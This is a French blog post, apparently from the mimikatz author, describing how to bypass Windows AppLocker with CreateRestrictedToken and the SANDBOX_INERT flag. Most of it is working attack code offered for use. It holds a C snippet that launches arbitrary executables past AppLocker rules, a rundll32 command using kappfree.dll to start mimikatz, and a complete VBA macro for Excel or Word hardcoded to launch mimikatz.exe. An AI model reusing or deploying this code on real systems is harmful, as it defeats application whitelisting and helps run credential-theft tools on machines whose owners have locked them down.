Ce n’est pas une découverte, le moyen de contourner AppLocker est documenté par Microsoft via la fonction CreateRestrictedToken
: http://msdn.microsoft.com/library/aa446583.aspx
SANDBOX_INERT 0x2
If this value is used, the system does not check AppLocker rules or apply Software Restriction Policies. For AppLocker, this flag disables checks for all four rule collections: Executable, Windows Installer, Script, and DLL.
… original …
Voici un petit exemple de code pour lancer vos exécutables (même sans être administrateur…), avec la ligne de commande contenue dans la variable lpszCmdLine
:
HANDLE monToken; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY, &monToken)) { HANDLE monSuperToken; if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken)) { PROCESS_INFORMATION mesInfosProcess; ZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION)); STARTUPINFO mesInfosDemarrer; ZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO)); mesInfosDemarrer.cb = sizeof(STARTUPINFO); wchar_t * commandLine = _wcsdup(lpszCmdLine); if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess)) { CloseHandle(mesInfosProcess.hThread); CloseHandle(mesInfosProcess.hProcess); } delete[] commandLine; CloseHandle(monSuperToken); } CloseHandle(monToken); }
Et parce que les librairies sont rarement interdites, il y a dans le package de mimikatz une nouvelle librairie (qui ne s’injecte pas ;)) pour lancer des programmes malgré AppLocker.
Elle peut s’utiliser directement via rundll32
:
rundll32 kappfree.dll,start mimikatz
le programme appelé peut être différent de mimikatz
Si vraiment cela ne suffit pas….
…vous pouvez toujours vous amuser dans l’éditeur VBA d’Excel, Word… ;)
modifier la variable commandLine...
Option Explicit 'WINBASEAPI __out Handle WINAPI GetCurrentProcess(VOID); Private Declare Function GetCurrentProcess Lib "kernel32" () As Long 'WINBASEAPI BOOL WINAPI CloseHandle( __in HANDLE hObject ); Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Boolean Private Const TOKEN_ASSIGN_PRIMARY = &H1 Private Const TOKEN_DUPLICATE = &H2 Private Const TOKEN_QUERY = &H8 'WINADVAPI BOOL WINAPI OpenProcessToken ( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle ); Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Boolean Private Const SANDBOX_INERT = &H2 'WINADVAPI BOOL APIENTRY CreateRestrictedToken( __in HANDLE ExistingTokenHandle, __in DWORD Flags, __in DWORD DisableSidCount, __in_ecount_opt(DisableSidCount) PSID_AND_ATTRIBUTES SidsToDisable, __in DWORD DeletePrivilegeCount, __in_ecount_opt(DeletePrivilegeCount) PLUID_AND_ATTRIBUTES PrivilegesToDelete, __in DWORD RestrictedSidCount, __in_ecount_opt(RestrictedSidCount) PSID_AND_ATTRIBUTES SidsToRestrict, __deref_out PHANDLE NewTokenHandle); Private Declare Function CreateRestrictedToken Lib "advapi32" (ByVal ExistingTokenHandle As Long, ByVal Flags As Long, ByVal DisableSidCount As Long, ByRef SidsToDisable As Long, ByVal DeletePrivilegeCount As Long, ByRef PrivilegesToDelete As Long, ByVal RestrictedSidCount As Long, ByRef SidsToRestrict As Long, ByRef NewTokenHandle As Long) As Boolean Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Const CREATE_NEW_CONSOLE = &H10 'WINADVAPI BOOL WINAPI CreateProcessAsUserA (__in_opt HANDLE hToken, __in_opt LPCSTR lpApplicationName, __inout_opt LPSTR lpCommandLine, __in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes, __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in BOOL bInheritHandles, __in DWORD dwCreationFlags, __in_opt LPVOID lpEnvironment, __in_opt LPCSTR lpCurrentDirectory, __in LPSTARTUPINFOA lpStartupInfo, __out LPPROCESS_INFORMATION lpProcessInformation); Private Declare Function CreateProcessAsUser Lib "advapi32" Alias "CreateProcessAsUserA" (ByVal hToken As Long, ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByRef lpProcessAttributes As Long, ByRef lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByRef lpEnvironment As Long, ByVal lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean Private Sub kappfree() Dim monToken As Long If (OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY Or TOKEN_DUPLICATE Or TOKEN_QUERY, monToken)) Then Dim monSuperToken As Long If (CreateRestrictedToken(monToken, SANDBOX_INERT, 0, ByVal 0&, 0, ByVal 0&, 0, ByVal 0&, monSuperToken)) Then Dim mesInfosProcess As PROCESS_INFORMATION Dim mesInfosDemarrer As STARTUPINFO mesInfosDemarrer.cb = Len(mesInfosDemarrer) Dim commandLine As String commandLine = "f:\mimikatz.exe" If (CreateProcessAsUser(monSuperToken, vbNullString, commandLine$, ByVal 0&, ByVal 0&, False, CREATE_NEW_CONSOLE, ByVal 0&, vbNullString, mesInfosDemarrer, mesInfosProcess)) Then CloseHandle mesInfosProcess.hThread CloseHandle mesInfosProcess.hProcess Else MsgBox "Erreur CreateProcessAsUser : " & Err.LastDllError End If CloseHandle monSuperToken End If CloseHandle monToken End If End Sub